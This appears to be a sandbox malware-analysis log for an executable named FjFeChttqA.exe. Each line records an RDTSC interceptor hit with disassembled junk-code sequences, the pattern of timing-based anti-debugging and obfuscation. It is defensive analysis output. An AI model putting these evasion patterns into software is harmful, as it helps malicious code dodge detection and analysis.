                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 129075D second address: 129076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F5D68C8BFFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290C6D second address: 1290C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EEAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290C7B second address: 1290D39 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F5D68C8C001h 0x00000013 jmp 00007F5D68C8BFFBh 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F5D68C8BFF8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 jmp 00007F5D68C8C003h 0x00000038 mov dword ptr [ebp+122D1E51h], edi 0x0000003e push dword ptr [ebp+122D3889h] 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F5D68C8BFF8h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000016h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e jmp 00007F5D68C8C007h 0x00000063 or dh, FFFFFF94h 0x00000066 call 00007F5D68C8BFF9h 0x0000006b jmp 00007F5D68C8BFFDh 0x00000070 push eax 0x00000071 jmp 00007F5D68C8BFFBh 0x00000076 mov eax, dword ptr [esp+04h] 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290D39 second address: 1290D43 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D692C6EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1290D43 second address: 1290D76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5D68C8C009h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F5D68C8BFFAh 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12926D0 second address: 12926E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F5D692C6EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F5D692C6EE8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12926E4 second address: 12926EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F5D68C8BFF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 12926EE second address: 12926F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 1294183 second address: 1294189 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 11A6066 second address: 11A606B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A026E second address: 56A030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D68C8BFFFh 0x00000009 adc ax, 78DEh 0x0000000e jmp 00007F5D68C8C009h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F5D68C8C000h 0x0000001a xor si, 38D8h 0x0000001f jmp 00007F5D68C8BFFBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F5D68C8C004h 0x00000030 adc cl, 00000038h 0x00000033 jmp 00007F5D68C8BFFBh 0x00000038 popfd 0x00000039 pushad 0x0000003a mov eax, 2C9A6705h 0x0000003f jmp 00007F5D68C8C002h 0x00000044 popad 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A030C second address: 56A0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A0310 second address: 56A0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A0316 second address: 56A033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D692C6EF8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56A033B second address: 56A0388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, DB3Bh 0x00000010 call 00007F5D68C8C000h 0x00000015 mov dx, cx 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F5D68C8BFFDh 0x00000022 mov ecx, dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5D68C8BFFDh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0698 second address: 56C069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C069D second address: 56C06D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d mov bl, ch 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F5D68C8BFFAh 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5D68C8C007h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C06D8 second address: 56C06F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EF4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C06F0 second address: 56C06F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C06F4 second address: 56C071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F5D692C6EF7h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, 60h 0x00000015 mov bx, si 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C071F second address: 56C0725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0725 second address: 56C0729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0729 second address: 56C072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C072D second address: 56C07D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5D692C6EEEh 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 call 00007F5D692C6EEEh 0x00000015 mov dl, cl 0x00000017 pop edx 0x00000018 popad 0x00000019 push ecx 0x0000001a pushad 0x0000001b mov dx, si 0x0000001e pushfd 0x0000001f jmp 00007F5D692C6EF0h 0x00000024 sbb eax, 4DA63278h 0x0000002a jmp 00007F5D692C6EEBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [esp], esi 0x00000034 jmp 00007F5D692C6EF6h 0x00000039 lea eax, dword ptr [ebp-04h] 0x0000003c pushad 0x0000003d mov dx, cx 0x00000040 mov di, ax 0x00000043 popad 0x00000044 nop 0x00000045 jmp 00007F5D692C6EF4h 0x0000004a push eax 0x0000004b pushad 0x0000004c jmp 00007F5D692C6EF1h 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C07D0 second address: 56C0808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5D68C8C005h 0x00000010 xor al, FFFFFF86h 0x00000013 jmp 00007F5D68C8C001h 0x00000018 popfd 0x00000019 push ecx 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0808 second address: 56C0841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D692C6EF3h 0x00000009 xor esi, 58B667BEh 0x0000000f jmp 00007F5D692C6EF9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0841 second address: 56C0851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dx, ax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0899 second address: 56C089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C089D second address: 56C08A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0903 second address: 56C095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5D692C6EF7h 0x00000008 pop eax 0x00000009 mov ax, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, esi 0x00000011 pushad 0x00000012 push ebx 0x00000013 mov eax, 653FADE3h 0x00000018 pop eax 0x00000019 call 00007F5D692C6EF9h 0x0000001e jmp 00007F5D692C6EF0h 0x00000023 pop ecx 0x00000024 popad 0x00000025 pop esi 0x00000026 pushad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0215 second address: 56B021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B021B second address: 56B021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B02D1 second address: 56B02FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D68C8BFFAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B02FC second address: 56B0321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5D692C6EF2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0321 second address: 56B0327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0327 second address: 56B032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B032B second address: 56B0345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0345 second address: 56B0349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0349 second address: 56B034D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B034D second address: 56B0353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0353 second address: 56B0404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C002h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c mov cl, 74h 0x0000000e pushfd 0x0000000f jmp 00007F5D68C8C003h 0x00000014 jmp 00007F5D68C8C003h 0x00000019 popfd 0x0000001a popad 0x0000001b je 00007F5D68C8C18Ah 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5D68C8C004h 0x00000028 xor ax, FA38h 0x0000002d jmp 00007F5D68C8BFFBh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F5D68C8C008h 0x00000039 sub ax, F498h 0x0000003e jmp 00007F5D68C8BFFBh 0x00000043 popfd 0x00000044 popad 0x00000045 lea ecx, dword ptr [ebp-14h] 0x00000048 pushad 0x00000049 mov eax, 0D922C6Bh 0x0000004e mov edi, eax 0x00000050 popad 0x00000051 mov dword ptr [ebp-14h], edi 0x00000054 pushad 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0451 second address: 56B0457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0457 second address: 56B045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B045D second address: 56B0461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B048C second address: 56B0490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0490 second address: 56B0496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0496 second address: 56B04D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F5D68C8C000h 0x00000010 jg 00007F5DD9079FCCh 0x00000016 pushad 0x00000017 mov edx, eax 0x00000019 mov eax, 4FB0C389h 0x0000001e popad 0x0000001f js 00007F5D68C8C05Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F5D68C8BFFBh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B04D8 second address: 56B056B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f pushfd 0x00000010 jmp 00007F5D692C6EF8h 0x00000015 sbb cx, 3468h 0x0000001a jmp 00007F5D692C6EEBh 0x0000001f popfd 0x00000020 popad 0x00000021 jne 00007F5DD96B4E5Bh 0x00000027 pushad 0x00000028 movzx esi, di 0x0000002b popad 0x0000002c mov ebx, dword ptr [ebp+08h] 0x0000002f jmp 00007F5D692C6EEAh 0x00000034 lea eax, dword ptr [ebp-2Ch] 0x00000037 jmp 00007F5D692C6EF0h 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F5D692C6EF7h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B056B second address: 56B05E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F5D68C8C000h 0x0000000c adc esi, 5120BB88h 0x00000012 jmp 00007F5D68C8BFFBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F5D68C8BFFFh 0x00000023 or cx, 2FCEh 0x00000028 jmp 00007F5D68C8C009h 0x0000002d popfd 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 pushad 0x00000033 call 00007F5D68C8C008h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B05E7 second address: 56B0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5D692C6EF1h 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0604 second address: 56B0648 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F5D68C8C005h 0x0000000d add si, 56C6h 0x00000012 jmp 00007F5D68C8C001h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5D68C8BFFCh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0648 second address: 56B064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B064E second address: 56B0652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0652 second address: 56B066E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov dh, 5Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B066E second address: 56B06BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5D68C8C001h 0x00000009 sub ax, 1036h 0x0000000e jmp 00007F5D68C8C001h 0x00000013 popfd 0x00000014 mov eax, 36A8B027h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5D68C8C009h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0725 second address: 56B072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B072B second address: 56B072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B072F second address: 56B0733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0118 second address: 56B0127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BB2 second address: 56B0BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BB6 second address: 56B0BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BBC second address: 56B0BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D692C6EECh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BDF second address: 56B0BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BE3 second address: 56B0C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, C8D7h 0x0000000a popad 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5D692C6EF9h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0C9F second address: 56B0CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4FEB1C4Eh 0x00000010 jmp 00007F5D68C8BFFEh 0x00000015 call 00007F5DD9070E9Fh 0x0000001a push 75A92B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [75AF4538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 mov eax, edx 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0982 second address: 56C09D5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5D692C6EF8h 0x00000008 or si, EE18h 0x0000000d jmp 00007F5D692C6EEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F5D692C6EF2h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5D692C6EEEh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09D5 second address: 56C09DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09DB second address: 56C09DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09DF second address: 56C09E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09E3 second address: 56C0A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5D692C6EF4h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B3B second address: 56C0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B3F second address: 56C0B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B94 second address: 56C0B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
